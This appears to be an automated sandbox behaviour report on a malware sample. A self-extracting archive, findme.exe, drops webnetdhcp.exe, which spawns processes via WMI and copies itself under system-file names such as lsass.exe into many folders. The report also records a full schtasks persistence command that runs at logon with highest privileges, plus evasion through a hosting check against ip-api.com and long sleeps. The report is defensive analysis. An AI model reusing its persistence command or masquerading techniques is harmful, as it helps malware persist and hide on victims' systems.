          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\findme.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\7-Zip\SearchApp.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\7-Zip\38384e6a620884Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\Windows Defender\Platform\9e8d7a4ca61bd9Jump to behavior
          Source: findme.exeStatic file information: File size 3403917 > 1048576
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: findme.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: findme.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: findme.exe
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
          Source: findme.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: findme.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: findme.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: findme.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: findme.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\findme.exeFile created: C:\runtimebrokerHost\__tmp_rar_sfx_access_check_4397375Jump to behavior
          Source: findme.exeStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DE28C push eax; ret 0_2_004DE2AA
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DED46 push ecx; ret 0_2_004DED59
          Source: C:\runtimebrokerHost\webnetdhcp.exeCode function: 10_2_00007FFAAC4986BD pushfd ; iretd 10_2_00007FFAAC4986C4
          Source: C:\runtimebrokerHost\webnetdhcp.exeCode function: 10_2_00007FFAAC492C13 pushad ; retf 10_2_00007FFAAC492C91

          Persistence and Installation Behavior

          barindex
          Creates processes via WMI
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\runtimebrokerHost\webnetdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Drops PE files with benign system names
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\runtimebrokerHost\lsass.exeJump to dropped file
          Drops executable to a common third party application directory
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile written: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Program Files (x86)\Google\RuntimeBroker.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Users\jones\AppData\Local\WmiPrvSE.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\runtimebrokerHost\lsass.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Program Files\7-Zip\SearchApp.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
          Source: C:\Users\user\Desktop\findme.exeFile created: C:\runtimebrokerHost\webnetdhcp.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Recovery\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exeJump to dropped file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\Users\user\Desktop\findme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Check if machine is in data center or colocation facility
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: C:\runtimebrokerHost\webnetdhcp.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeMemory allocated: 1B000000 memory reserve | memory write watchJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599780Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599653Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599539Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599417Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599281Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599171Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599057Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598948Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598734Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598625Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598516Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598406Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598294Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598184Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598071Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597959Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597712Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597608Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597496Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597390Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597280Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597164Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 596995Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 596866Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeWindow / User API: threadDelayed 3887Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeWindow / User API: threadDelayed 1865Jump to behavior
          Source: C:\Users\user\Desktop\findme.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23083
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7428Thread sleep count: 3887 > 30Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7428Thread sleep count: 1865 > 30Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7476Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -13835058055282155s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599780s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599653s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599539s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599417s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599281s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599171s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -599057s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598948s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598734s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598625s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598516s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598406s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598294s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598184s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -598071s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597959s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597844s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597712s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597608s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597496s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597390s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597280s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -597164s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -596995s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -596866s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7464Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004CA5F4
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_004DB8E0
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004EAAA8 FindFirstFileExA,0_2_004EAAA8
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DDD72 VirtualQuery,GetSystemInfo,0_2_004DDD72
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599890Jump to behavior
